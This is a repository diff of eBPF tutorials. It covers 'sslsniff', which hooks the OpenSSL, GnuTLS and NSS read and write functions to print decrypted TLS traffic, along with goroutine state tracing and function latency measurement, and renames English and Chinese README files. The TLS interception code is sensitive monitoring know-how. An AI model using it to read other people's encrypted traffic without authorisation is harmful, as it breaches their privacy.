`do_handshake` and determine if the handshake was successful. -5. Find or initialize the `probe_SSL_data_t` data structure associated with the current thread. -6. Update the data structure's fields, including timestamp, duration, process information, etc. -7. Use `bpf_perf_event_output` to send the data to user space. - -Our eBPF code not only tracks data transmission for `ssl_read` and `ssl_write` but also focuses on the SSL/TLS handshake process. This information is crucial for a deeper understanding and optimization of the performance of secure connections. - -Through these hook functions, we can obtain data regarding the success of the handshake, the time taken for the handshake, and related process information. This provides us with insights into the behavior of the system's SSL/TLS, enabling us to perform more in-depth analysis and optimization when necessary. 
- -## User-Space Assisted Code Analysis and Interpretation - -In the eBPF ecosystem, user-space and kernel-space code often work in collaboration. Kernel-space code is responsible for data collection, while user-space code manages, processes, and handles this data. In this section, we will explain how the above user-space code collaborates with eBPF to trace SSL/TLS interactions. - -### 1. Supported Library Attachment - -In the provided code snippet, based on the setting of the `env` environment variable, the program can choose to attach to three common encryption libraries (OpenSSL, GnuTLS, and NSS). This means that we can trace calls to multiple libraries within the same tool. - -To achieve this functionality, the `find_library_path` function is first used to determine the library's path. Then, depending on the library type, the corresponding `attach_` function is called to attach the eBPF program to the library function. - -```c - if (env.openssl) { - char *openssl_path = find_library_path("libssl.so"); - printf("OpenSSL path: %s\n", openssl_path); - attach_openssl(obj, openssl_path); - } - if (env.gnutls) { - char *gnutls_path = find_library_path("libgnutls.so"); - printf("GnuTLS path: %s\n", gnutls_path); - attach_gnutls(obj, gnutls_path); - } - if (env.nss) { - char *nss_path = find_library_path("libnspr4.so"); - printf("NSS path: %s\n", nss_path); - attach_nss(obj, nss_path); - } -``` - -This section primarily covers the attachment logic for the OpenSSL, GnuTLS, and NSS libraries. NSS is a set of security libraries designed for organizations, supporting the creation of secure client and server applications. Originally developed by Netscape, they are now maintained by Mozilla. The other two libraries have been introduced earlier and are not reiterated here. - -### 2. 
Detailed Attachment Logic - -The specific `attach` functions are as follows: - -```c -#define __ATTACH_UPROBE(skel, binary_path, sym_name, prog_name, is_retprobe) \ - do { \ - LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts, .func_name = #sym_name, \ - .retprobe = is_retprobe); \ - skel->links.prog_name = bpf_program__attach_uprobe_opts( \ - skel->progs.prog_name, env.pid, binary_path, 0, &uprobe_opts); \ - } while (false) - -int attach_openssl(struct sslsniff_bpf *skel, const char *lib) { - ATTACH_UPROBE_CHECKED(skel, lib, SSL_write, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, SSL_write, probe_SSL_write_exit); - ATTACH_UPROBE_CHECKED(skel, lib, SSL_read, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, SSL_read, probe_SSL_read_exit); - - if (env.latency && env.handshake) { - ATTACH_UPROBE_CHECKED(skel, lib, SSL_do_handshake, - probe_SSL_do_handshake_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, SSL_do_handshake, - probe_SSL_do_handshake_exit); - } - - return 0; -} - -int attach_gnutls(struct sslsniff_bpf *skel, const char *lib) { - ATTACH_UPROBE_CHECKED(skel, lib, gnutls_record_send, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, gnutls_record_send, probe_SSL_write_exit); - ATTACH_UPROBE_CHECKED(skel, lib, gnutls_record_recv, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, gnutls_record_recv, probe_SSL_read_exit); - - return 0; -} - -int attach_nss(struct sslsniff_bpf *skel, const char *lib) { - ATTACH_UPROBE_CHECKED(skel, lib, PR_Write, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, PR_Write, probe_SSL_write_exit); - ATTACH_UPROBE_CHECKED(skel, lib, PR_Send, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, PR_Send, probe_SSL_write_exit); - ATTACH_UPROBE_CHECKED(skel, lib, PR_Read, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, PR_Read, probe_SSL_read_exit); - ATTACH_UPROBE_CHECKED(skel, lib, PR_Recv, probe_SSL_rw_enter); - ATTACH_URETPROBE_CHECKED(skel, lib, PR_Recv, probe_SSL_read_exit); - - return 0; -} -``` - -We further examine the `attach_` function and can see that they both use the `ATTACH_UPROBE_CHECKED` and `ATTACH_URETPROBE_CHECKED` macros to implement specific mounting logic. These two macros are used respectively for setting uprobe (function entry) and uretprobe (function return). - -Considering that different libraries have different API function names (for example, OpenSSL uses `SSL_write`, while GnuTLS uses `gnutls_record_send`), we need to write a separate `attach_` function for each library. - -For instance, in the `attach_openssl` function, we set up probes for both `SSL_write` and `SSL_read`. If users also want to track handshake latency (`env.latency`) and the handshake process (`env.handshake`), we set up a probe for `SSL_do_handshake`. - -In the eBPF ecosystem, `perf_buffer` is an efficient mechanism used to transfer data from kernel space to user space. This is particularly useful for kernel-space eBPF programs as they can't directly interact with user space. With `perf_buffer`, we can collect data in kernel-space eBPF programs and then asynchronously read this data in user space. 
We use the `perf_buffer__poll` function to read data reported in kernel space, as shown below: - -```c -while (!exiting) { - err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); - if (err < 0 && err != -EINTR) { - warn("error polling perf buffer: %s\n", strerror(-err)); - goto cleanup; - } - err = 0; -} -``` - -Finally, in the `print_event` function, we print the data to standard output: - -```c -// Function to print the event from the perf buffer -void print_event(struct probe_SSL_data_t *event, const char *evt) { - ... - if (buf_size != 0) { - if (env.hexdump) { - // 2 characters for each byte + null terminator - char hex_data[MAX_BUF_SIZE * 2 + 1] = {0}; - buf_to_hex((uint8_t *)buf, buf_size, hex_data); - - printf("\n%s\n", s_mark); - for (size_t i = 0; i < strlen(hex_data); i += 32) { - printf("%.32s\n", hex_data + i); - } - printf("%s\n\n", e_mark); - } else { - printf("\n%s\n%s\n%s\n\n", s_mark, buf, e_mark); - } - } -} -``` - -You can find the complete source code here: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff) - -## Compilation and Execution - -To start using `sslsniff`, you need to first compile it: - -```sh -make -``` - -Once done, follow these steps: - -### **Start sslsniff** - -In a terminal, execute the following command to start `sslsniff`: - -```sh -sudo ./sslsniff -``` - -### **Execute CURL command** - -In another terminal, execute: - -```console -curl https://example.com -``` - -Under normal circumstances, you will see output similar to the following: - -```html - - - - Example Domain - ... - -
- ... -
- - -``` - -### **sslsniff Output** - -After executing the `curl` command, `sslsniff` will display the following content: - -```txt - READ/RECV 0.132786160 curl 47458 1256 - ----- DATA ----- - - ... -
-<html>
-<head>
-<title>Example Domain</title>
-</head>
- ... -
- - - - ----- END DATA ----- -``` - -**Note**: The displayed HTML content may vary depending on the specific content of the `example.com` page. - -### Displaying Latency and Handshake Process - -To view latency and handshake process, execute the following command: - -```console -$ sudo ./sslsniff -l --handshake -OpenSSL path: /lib/x86_64-linux-gnu/libssl.so.3 -GnuTLS path: /lib/x86_64-linux-gnu/libgnutls.so.30 -NSS path: /lib/x86_64-linux-gnu/libnspr4.so -FUNC TIME(s) COMM PID LEN LAT(ms) -HANDSHAKE 0.000000000 curl 6460 1 1.384 WRITE/SEND 0.000115400 curl 6460 24 0.014 -``` - -### Hexadecimal Output - -To display data in hexadecimal format, execute the following command: - -```console -$ sudo ./sslsniff --hexdump -WRITE/SEND 0.000000000 curl 16104 24 ------ DATA ----- -505249202a20485454502f322e300d0a -0d0a534d0d0a0d0a ------ END DATA ----- - -... -``` - -## Summary - -eBPF is a very powerful technology that can help us gain deeper insights into how a system works. This tutorial is a simple example demonstrating how to use eBPF to monitor SSL/TLS communication. If you're interested in eBPF technology and want to learn more and practice further, you can visit our tutorial code repository at and tutorial website at . - -References: - -- -- -- -- -- - -> The original link of this article: diff --git a/src/31-goroutine/README.md b/src/31-goroutine/README.md index b59004e..02e0cde 100644 --- a/src/31-goroutine/README.md +++ b/src/31-goroutine/README.md @@ -1,31 +1,31 @@ -# eBPF 实践教程:使用 eBPF 跟踪 Go 协程状态 +# eBPF Practical Tutorial: Using eBPF to Trace Go Routine States -Go 是 Google 创建的一种广受欢迎的编程语言,以其强大的并发模型而著称。Go 语言的一个重要特点是协程(goroutine)的使用——这些协程是轻量级、由 Go 运行时管理的线程,使得编写并发程序变得非常简单。然而,在实时环境中理解和跟踪这些协程的执行状态,尤其是在调试复杂系统时,可能会面临很大的挑战。 +Go, the popular programming language created by Google, is known for its powerful concurrency model. One of the key features that makes Go stand out is the use of goroutines—lightweight, managed threads that make it easy to write concurrent programs. However, understanding and tracing the execution states of these goroutines in real time can be challenging, especially when debugging complex systems. -这时我们可以利用 eBPF(扩展伯克利包过滤器)技术。eBPF 最初设计用于网络数据包过滤,但随着时间的推移,eBPF 已经发展成为一个强大的工具,用于跟踪和监控系统行为。通过使用 eBPF,我们可以深入到内核,收集有关 Go 程序运行时行为的数据,包括协程的状态。本文将探讨如何使用 eBPF 跟踪 Go 程序中的协程状态转换。 +Enter eBPF (Extended Berkeley Packet Filter), a technology originally designed for network packet filtering, but which has since evolved into a powerful tool for tracing and monitoring system behavior. By leveraging eBPF, we can tap into the kernel and gather insights about the runtime behavior of Go programs, including the states of goroutines. This blog post explores how to use eBPF to trace the state transitions of goroutines in a Go program. -## 背景:协程与 eBPF +## Background: Goroutines and eBPF -### 协程 +### Goroutines -协程是 Go 语言的核心特性之一,它提供了一种简单而高效的并发处理方式。与传统的线程不同,协程由 Go 运行时管理,而不是由操作系统管理,因此更加轻量化。协程可以在以下几种状态之间进行转换: +Goroutines are a core feature of Go, providing a simple and efficient way to handle concurrency. Unlike traditional threads, goroutines are managed by the Go runtime rather than the operating system, making them much more lightweight. Goroutines can switch states, such as: -- **RUNNABLE(可运行)**:协程已准备好运行。 -- **RUNNING(运行中)**:协程正在执行中。 -- **WAITING(等待)**:协程正在等待某个事件(如 I/O 或定时器)。 -- **DEAD(终止)**:协程执行完毕并已终止。 +- **RUNNABLE**: The goroutine is ready to run. +- **RUNNING**: The goroutine is currently executing. +- **WAITING**: The goroutine is waiting for some event (e.g., I/O, timers). 
+- **DEAD**: The goroutine has finished executing and is terminated. -理解这些状态以及协程之间的状态转换对于诊断性能问题、确保 Go 程序的高效运行至关重要。 +Understanding these states and how goroutines transition between them is crucial for diagnosing performance issues and ensuring that your Go programs are running efficiently. ### eBPF -eBPF 是一种强大的技术,它允许开发人员在不修改内核源代码或加载内核模块的情况下,在 Linux 内核中运行自定义程序。eBPF 最初用于数据包过滤,但现在已扩展为一种多功能工具,广泛应用于性能监控、安全和调试。 +eBPF is a powerful technology that allows developers to run custom programs inside the Linux kernel without changing the kernel source code or loading kernel modules. Initially designed for packet filtering, eBPF has grown into a versatile tool used for performance monitoring, security, and debugging. -通过编写 eBPF 程序,开发人员可以跟踪各种系统事件,包括系统调用、网络事件和进程执行。在本文中,我们将重点介绍如何使用 eBPF 跟踪 Go 程序中协程的状态转换。 +By writing eBPF programs, developers can trace various system events, including system calls, network events, and process execution. In this blog, we'll focus on how eBPF can be used to trace the state transitions of goroutines in a Go program. -## eBPF 内核代码 +## The eBPF Kernel Code -现在,让我们深入探讨实现该跟踪功能的 eBPF 内核代码。 +Let's dive into the eBPF kernel code that makes this tracing possible. ```c #include @@ -64,30 +64,30 @@ int uprobe_runtime_casgstatus(struct pt_regs *ctx) { char LICENSE[] SEC("license") = "GPL"; ``` -1. **头文件**:代码首先包含了必要的头文件,如 `vmlinux.h`(提供内核定义)和 `bpf_helpers.h`(提供 eBPF 程序的辅助函数)。 -2. **GOID_OFFSET**:`goid` 字段的偏移量被硬编码为 `0x98`,这是特定于所跟踪的 Go 版本和程序的。此偏移量在不同的 Go 版本或程序中可能有所不同。 -3. **环形缓冲区映射**:定义了一个 BPF 环形缓冲区映射,用于存储协程的执行数据。这个缓冲区允许内核高效地将信息传递到用户空间。 -4. **Uprobe**:该 eBPF 程序的核心是一个附加到 Go 程序中 `runtime.casgstatus` 函数的 uprobe(用户级探针)。该函数负责改变协程的状态,因此非常适合用来拦截和跟踪状态转换。 -5. **读取协程 ID**:`bpf_probe_read_user` 函数从用户空间内存中读取协程 ID(`goid`),使用的是预定义的偏移量。 -6. **提交数据**:如果成功读取了协程 ID,则数据会与进程 ID、线程组 ID 以及协程的新状态一起存储在环形缓冲区中。随后,这些数据会提交到用户空间以供分析。 +1. **Header Files**: The code begins by including necessary header files, such as `vmlinux.h`, which provides kernel definitions, and `bpf_helpers.h`, which offers helper functions for eBPF programs. +2. **GOID_OFFSET**: The offset of the `goid` field is hardcoded to `0x98`, which is specific to the Go version and the program being traced. This offset may vary between different Go versions or programs. +3. **Ring Buffer Map**: A BPF ring buffer map is defined to store the goroutine execution data. This buffer allows the kernel to pass information to user space efficiently. +4. **Uprobe**: The core of this eBPF program is an uprobes (user-level probe) attached to the `runtime.casgstatus` function in the Go program. This function is responsible for changing the state of a goroutine, making it an ideal place to intercept and trace state transitions. +5. **Reading Goroutine ID**: The `bpf_probe_read_user` function reads the goroutine ID (`goid`) from the user space memory, using the predefined offset. +6. **Submitting Data**: If the goroutine ID is successfully read, the data is stored in the ring buffer along with the process ID, thread group ID, and the new state of the goroutine. This data is then submitted to the user space for analysis. -## 运行程序 +## Running the Program -要运行此跟踪程序,请按照以下步骤操作: +To run this tracing program, follow these steps: -1. **编译 eBPF 代码**:使用类似 `ecc`(eBPF 编译集合)这样的编译器编译 eBPF 程序,并生成一个可以由 eBPF 加载器加载的包。 +1. **Compile the eBPF Code**: Compile the eBPF program using a compiler like `ecc` (eBPF Compiler Collection) and generate a package that can be loaded by an eBPF loader. ```bash ecc goroutine.bpf.c goroutine.h ``` -2. **运行 eBPF 程序**:使用 eBPF 加载器运行编译后的 eBPF 程序。 +2. 
**Run the eBPF Program**: Use an eBPF loader to run the compiled eBPF program. ```bash ecli-rs run package.json ``` -3. **输出**:程序将输出协程的状态转换及其 `goid`、`pid` 和 `tgid`。以下是一个示例输出: +3. **Output**: The program will output the state transitions of goroutines along with their `goid`, `pid`, and `tgid`. Here’s an example of the output: ```console TIME STATE GOID PID TGID @@ -97,16 +97,16 @@ char LICENSE[] SEC("license") = "GPL"; 21:00:47 WAITING(4) 2 2542847 2542844 ``` -完整代码可以在 找到。 +You can find the complete code in -如果你想了解更多关于 eBPF 的知识和实践,你可以访问我们的教程代码库 或网站 获取更多示例和完整教程。 +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. -内核模式 eBPF 运行时的 `Uprobe` 可能会带来较大的性能开销。在这种情况下,你也可以考虑使用用户模式的 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是基于 LLVM JIT/AOT 的用户模式 eBPF 运行时,它可以在用户模式下运行 eBPF 程序,并且在处理 `uprobe` 时比内核模式 eBPF 更快。 +`Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode, compatible with kernel mode eBPF and can be faster for `uprobe`. -### 结论 +### Conclusion -使用 eBPF 跟踪协程状态可以深入了解 Go 程序的执行情况,尤其是在传统调试工具可能无法胜任的生产环境中。通过利用 eBPF,开发人员可以监控和诊断性能问题,确保 Go 应用程序高效运行。 +Tracing goroutine states using eBPF provides deep insights into the execution of Go programs, especially in production environments where traditional debugging tools may fall short. By leveraging eBPF, developers can monitor and diagnose performance issues, ensuring their Go applications run efficiently. -请注意,本 eBPF 程序中使用的偏移量是特定于所跟踪的 Go 版本和程序的。随着 Go 的发展,这些偏移量可能会发生变化,需要对 eBPF 代码进行更新。 +Keep in mind that the offsets used in this eBPF program are specific to the Go version and the program being traced. As Go evolves, these offsets may change, requiring updates to the eBPF code. -在未来的探索中,我们可以将这种方法扩展到跟踪 Go 程序或其他语言的其他方面,展示 eBPF 在现代软件开发中的多功能性和强大作用。 +In future explorations, we can extend this approach to trace other aspects of Go programs or even other languages, demonstrating the versatility and power of eBPF in modern software development. 
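+One way to soften the version-specific offset caveat is to turn the hardcoded `GOID_OFFSET` into a load-time constant that the loader fills in, for example from the DWARF info of the target binary. A minimal sketch of the kernel side, with `goid_offset` as an illustrative name rather than the tutorial's actual code:
+
+```c
+/* Sketch: goid offset as a constant patched by user space before load,
+ * e.g. skel->rodata->goid_offset = <offset read from debug info>; */
+const volatile u64 goid_offset = 0x98;
+
+SEC("uprobe/./go-server-http/main:runtime.casgstatus")
+int uprobe_casgstatus_configurable(struct pt_regs *ctx)
+{
+    void *gp = (void *)ctx->ax; /* the g pointer, as in the code above */
+    u64 goid;
+
+    if (bpf_probe_read_user(&goid, sizeof(goid), gp + goid_offset))
+        return 0;
+    /* reserve and submit to the ring buffer exactly as shown earlier */
+    return 0;
+}
+```
+
+With this layout, supporting a new Go release only requires writing a new offset into the skeleton's `.rodata` before loading, instead of recompiling the BPF object.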
diff --git a/src/31-goroutine/README.zh.md b/src/31-goroutine/README.zh.md new file mode 100644 index 0000000..b59004e --- /dev/null +++ b/src/31-goroutine/README.zh.md @@ -0,0 +1,112 @@ +# eBPF 实践教程:使用 eBPF 跟踪 Go 协程状态 + +Go 是 Google 创建的一种广受欢迎的编程语言,以其强大的并发模型而著称。Go 语言的一个重要特点是协程(goroutine)的使用——这些协程是轻量级、由 Go 运行时管理的线程,使得编写并发程序变得非常简单。然而,在实时环境中理解和跟踪这些协程的执行状态,尤其是在调试复杂系统时,可能会面临很大的挑战。 + +这时我们可以利用 eBPF(扩展伯克利包过滤器)技术。eBPF 最初设计用于网络数据包过滤,但随着时间的推移,eBPF 已经发展成为一个强大的工具,用于跟踪和监控系统行为。通过使用 eBPF,我们可以深入到内核,收集有关 Go 程序运行时行为的数据,包括协程的状态。本文将探讨如何使用 eBPF 跟踪 Go 程序中的协程状态转换。 + +## 背景:协程与 eBPF + +### 协程 + +协程是 Go 语言的核心特性之一,它提供了一种简单而高效的并发处理方式。与传统的线程不同,协程由 Go 运行时管理,而不是由操作系统管理,因此更加轻量化。协程可以在以下几种状态之间进行转换: + +- **RUNNABLE(可运行)**:协程已准备好运行。 +- **RUNNING(运行中)**:协程正在执行中。 +- **WAITING(等待)**:协程正在等待某个事件(如 I/O 或定时器)。 +- **DEAD(终止)**:协程执行完毕并已终止。 + +理解这些状态以及协程之间的状态转换对于诊断性能问题、确保 Go 程序的高效运行至关重要。 + +### eBPF + +eBPF 是一种强大的技术,它允许开发人员在不修改内核源代码或加载内核模块的情况下,在 Linux 内核中运行自定义程序。eBPF 最初用于数据包过滤,但现在已扩展为一种多功能工具,广泛应用于性能监控、安全和调试。 + +通过编写 eBPF 程序,开发人员可以跟踪各种系统事件,包括系统调用、网络事件和进程执行。在本文中,我们将重点介绍如何使用 eBPF 跟踪 Go 程序中协程的状态转换。 + +## eBPF 内核代码 + +现在,让我们深入探讨实现该跟踪功能的 eBPF 内核代码。 + +```c +#include +#include "goroutine.h" +#include +#include +#include + +#define GOID_OFFSET 0x98 + +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +SEC("uprobe/./go-server-http/main:runtime.casgstatus") +int uprobe_runtime_casgstatus(struct pt_regs *ctx) { + int newval = ctx->cx; + void *gp = ctx->ax; + struct goroutine_execute_data *data; + u64 goid; + if (bpf_probe_read_user(&goid, sizeof(goid), gp + GOID_OFFSET) == 0) { + data = bpf_ringbuf_reserve(&rb, sizeof(*data), 0); + if (data) { + u64 pid_tgid = bpf_get_current_pid_tgid(); + data->pid = pid_tgid; + data->tgid = pid_tgid >> 32; + data->goid = goid; + data->state = newval; + bpf_ringbuf_submit(data, 0); + } + } + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +1. **头文件**:代码首先包含了必要的头文件,如 `vmlinux.h`(提供内核定义)和 `bpf_helpers.h`(提供 eBPF 程序的辅助函数)。 +2. **GOID_OFFSET**:`goid` 字段的偏移量被硬编码为 `0x98`,这是特定于所跟踪的 Go 版本和程序的。此偏移量在不同的 Go 版本或程序中可能有所不同。 +3. **环形缓冲区映射**:定义了一个 BPF 环形缓冲区映射,用于存储协程的执行数据。这个缓冲区允许内核高效地将信息传递到用户空间。 +4. **Uprobe**:该 eBPF 程序的核心是一个附加到 Go 程序中 `runtime.casgstatus` 函数的 uprobe(用户级探针)。该函数负责改变协程的状态,因此非常适合用来拦截和跟踪状态转换。 +5. **读取协程 ID**:`bpf_probe_read_user` 函数从用户空间内存中读取协程 ID(`goid`),使用的是预定义的偏移量。 +6. **提交数据**:如果成功读取了协程 ID,则数据会与进程 ID、线程组 ID 以及协程的新状态一起存储在环形缓冲区中。随后,这些数据会提交到用户空间以供分析。 + +## 运行程序 + +要运行此跟踪程序,请按照以下步骤操作: + +1. **编译 eBPF 代码**:使用类似 `ecc`(eBPF 编译集合)这样的编译器编译 eBPF 程序,并生成一个可以由 eBPF 加载器加载的包。 + + ```bash + ecc goroutine.bpf.c goroutine.h + ``` + +2. **运行 eBPF 程序**:使用 eBPF 加载器运行编译后的 eBPF 程序。 + + ```bash + ecli-rs run package.json + ``` + +3. 
**输出**:程序将输出协程的状态转换及其 `goid`、`pid` 和 `tgid`。以下是一个示例输出: + + ```console + TIME STATE GOID PID TGID + 21:00:47 DEAD(6) 0 2542844 2542844 + 21:00:47 RUNNABLE(1) 0 2542844 2542844 + 21:00:47 RUNNING(2) 1 2542844 2542844 + 21:00:47 WAITING(4) 2 2542847 2542844 + ``` + +完整代码可以在 找到。 + +如果你想了解更多关于 eBPF 的知识和实践,你可以访问我们的教程代码库 或网站 获取更多示例和完整教程。 + +内核模式 eBPF 运行时的 `Uprobe` 可能会带来较大的性能开销。在这种情况下,你也可以考虑使用用户模式的 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是基于 LLVM JIT/AOT 的用户模式 eBPF 运行时,它可以在用户模式下运行 eBPF 程序,并且在处理 `uprobe` 时比内核模式 eBPF 更快。 + +### 结论 + +使用 eBPF 跟踪协程状态可以深入了解 Go 程序的执行情况,尤其是在传统调试工具可能无法胜任的生产环境中。通过利用 eBPF,开发人员可以监控和诊断性能问题,确保 Go 应用程序高效运行。 + +请注意,本 eBPF 程序中使用的偏移量是特定于所跟踪的 Go 版本和程序的。随着 Go 的发展,这些偏移量可能会发生变化,需要对 eBPF 代码进行更新。 + +在未来的探索中,我们可以将这种方法扩展到跟踪 Go 程序或其他语言的其他方面,展示 eBPF 在现代软件开发中的多功能性和强大作用。 diff --git a/src/31-goroutine/README_en.md b/src/31-goroutine/README_en.md deleted file mode 100644 index 02e0cde..0000000 --- a/src/31-goroutine/README_en.md +++ /dev/null @@ -1,112 +0,0 @@ -# eBPF Practical Tutorial: Using eBPF to Trace Go Routine States - -Go, the popular programming language created by Google, is known for its powerful concurrency model. One of the key features that makes Go stand out is the use of goroutines—lightweight, managed threads that make it easy to write concurrent programs. However, understanding and tracing the execution states of these goroutines in real time can be challenging, especially when debugging complex systems. - -Enter eBPF (Extended Berkeley Packet Filter), a technology originally designed for network packet filtering, but which has since evolved into a powerful tool for tracing and monitoring system behavior. By leveraging eBPF, we can tap into the kernel and gather insights about the runtime behavior of Go programs, including the states of goroutines. This blog post explores how to use eBPF to trace the state transitions of goroutines in a Go program. - -## Background: Goroutines and eBPF - -### Goroutines - -Goroutines are a core feature of Go, providing a simple and efficient way to handle concurrency. Unlike traditional threads, goroutines are managed by the Go runtime rather than the operating system, making them much more lightweight. Goroutines can switch states, such as: - -- **RUNNABLE**: The goroutine is ready to run. -- **RUNNING**: The goroutine is currently executing. -- **WAITING**: The goroutine is waiting for some event (e.g., I/O, timers). -- **DEAD**: The goroutine has finished executing and is terminated. - -Understanding these states and how goroutines transition between them is crucial for diagnosing performance issues and ensuring that your Go programs are running efficiently. - -### eBPF - -eBPF is a powerful technology that allows developers to run custom programs inside the Linux kernel without changing the kernel source code or loading kernel modules. Initially designed for packet filtering, eBPF has grown into a versatile tool used for performance monitoring, security, and debugging. - -By writing eBPF programs, developers can trace various system events, including system calls, network events, and process execution. In this blog, we'll focus on how eBPF can be used to trace the state transitions of goroutines in a Go program. - -## The eBPF Kernel Code - -Let's dive into the eBPF kernel code that makes this tracing possible. 
- -```c -#include -#include "goroutine.h" -#include -#include -#include - -#define GOID_OFFSET 0x98 - -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} rb SEC(".maps"); - -SEC("uprobe/./go-server-http/main:runtime.casgstatus") -int uprobe_runtime_casgstatus(struct pt_regs *ctx) { - int newval = ctx->cx; - void *gp = ctx->ax; - struct goroutine_execute_data *data; - u64 goid; - if (bpf_probe_read_user(&goid, sizeof(goid), gp + GOID_OFFSET) == 0) { - data = bpf_ringbuf_reserve(&rb, sizeof(*data), 0); - if (data) { - u64 pid_tgid = bpf_get_current_pid_tgid(); - data->pid = pid_tgid; - data->tgid = pid_tgid >> 32; - data->goid = goid; - data->state = newval; - bpf_ringbuf_submit(data, 0); - } - } - return 0; -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -1. **Header Files**: The code begins by including necessary header files, such as `vmlinux.h`, which provides kernel definitions, and `bpf_helpers.h`, which offers helper functions for eBPF programs. -2. **GOID_OFFSET**: The offset of the `goid` field is hardcoded to `0x98`, which is specific to the Go version and the program being traced. This offset may vary between different Go versions or programs. -3. **Ring Buffer Map**: A BPF ring buffer map is defined to store the goroutine execution data. This buffer allows the kernel to pass information to user space efficiently. -4. **Uprobe**: The core of this eBPF program is an uprobes (user-level probe) attached to the `runtime.casgstatus` function in the Go program. This function is responsible for changing the state of a goroutine, making it an ideal place to intercept and trace state transitions. -5. **Reading Goroutine ID**: The `bpf_probe_read_user` function reads the goroutine ID (`goid`) from the user space memory, using the predefined offset. -6. **Submitting Data**: If the goroutine ID is successfully read, the data is stored in the ring buffer along with the process ID, thread group ID, and the new state of the goroutine. This data is then submitted to the user space for analysis. - -## Running the Program - -To run this tracing program, follow these steps: - -1. **Compile the eBPF Code**: Compile the eBPF program using a compiler like `ecc` (eBPF Compiler Collection) and generate a package that can be loaded by an eBPF loader. - - ```bash - ecc goroutine.bpf.c goroutine.h - ``` - -2. **Run the eBPF Program**: Use an eBPF loader to run the compiled eBPF program. - - ```bash - ecli-rs run package.json - ``` - -3. **Output**: The program will output the state transitions of goroutines along with their `goid`, `pid`, and `tgid`. Here’s an example of the output: - - ```console - TIME STATE GOID PID TGID - 21:00:47 DEAD(6) 0 2542844 2542844 - 21:00:47 RUNNABLE(1) 0 2542844 2542844 - 21:00:47 RUNNING(2) 1 2542844 2542844 - 21:00:47 WAITING(4) 2 2542847 2542844 - ``` - -You can find the complete code in - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. - -`Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode, compatible with kernel mode eBPF and can be faster for `uprobe`. 
- -### Conclusion - -Tracing goroutine states using eBPF provides deep insights into the execution of Go programs, especially in production environments where traditional debugging tools may fall short. By leveraging eBPF, developers can monitor and diagnose performance issues, ensuring their Go applications run efficiently. - -Keep in mind that the offsets used in this eBPF program are specific to the Go version and the program being traced. As Go evolves, these offsets may change, requiring updates to the eBPF code. - -In future explorations, we can extend this approach to trace other aspects of Go programs or even other languages, demonstrating the versatility and power of eBPF in modern software development. diff --git a/src/32-http2/README.md b/src/32-http2/README.zh.md similarity index 100% rename from src/32-http2/README.md rename to src/32-http2/README.zh.md diff --git a/src/33-funclatency/README.md b/src/33-funclatency/README.md index 2fe33b1..83c19f7 100644 --- a/src/33-funclatency/README.md +++ b/src/33-funclatency/README.md @@ -1,29 +1,29 @@ -# 使用 eBPF 测量函数延迟 +# Measuring Function Latency with eBPF -在现代软件系统中,了解函数的性能特性,尤其是那些对应用程序运行至关重要的函数的性能特性,是至关重要的。性能分析中的一个关键指标是**函数延迟**,即函数从开始到完成所花费的时间。通过分析函数延迟,开发人员可以识别瓶颈、优化性能,并确保系统在各种条件下高效运行。 +In modern software systems, understanding the performance characteristics of functions—especially those critical to the operation of your application—is paramount. One key metric in performance analysis is **function latency**, which is the time taken by a function to execute from start to finish. By analyzing function latency, developers can identify bottlenecks, optimize performance, and ensure that their systems operate efficiently under various conditions. -本文将深入探讨如何使用 eBPF 这一强大的工具来测量函数延迟,并展示如何在内核和用户空间中进行跟踪和监控。 +This blog post will dive into how to measure function latency using eBPF, an incredibly powerful tool for tracing and monitoring both kernel and user-space programs. -## 什么是 eBPF? +## What is eBPF? -eBPF(扩展伯克利包过滤器)是一项革命性的技术,它允许开发人员编写小型程序在 Linux 内核中运行。eBPF 最初是为数据包过滤设计的,但它已经发展成为一个多功能工具,用于跟踪、监控和分析系统行为。通过 eBPF,您几乎可以对 Linux 内核或用户空间的任何部分进行插桩,从而收集性能数据、执行安全策略,甚至实时调试系统——这一切都无需修改内核源码或重启系统。 +eBPF (Extended Berkeley Packet Filter) is a revolutionary technology that allows developers to write small programs that run in the Linux kernel. Originally designed for packet filtering, eBPF has evolved into a versatile tool for tracing, monitoring, and profiling system behavior. With eBPF, you can instrument almost any part of the Linux kernel or user-space programs to collect performance data, enforce security policies, or even debug systems in real time—all without the need to modify the kernel source code or restart the system. -eBPF 程序在内核的沙盒环境中执行,确保了安全性和稳定性。这些程序可以附加到内核中的各种钩子上,如系统调用、网络事件和跟踪点,甚至可以通过 uprobes(用户级探针)附加到用户空间的函数。eBPF 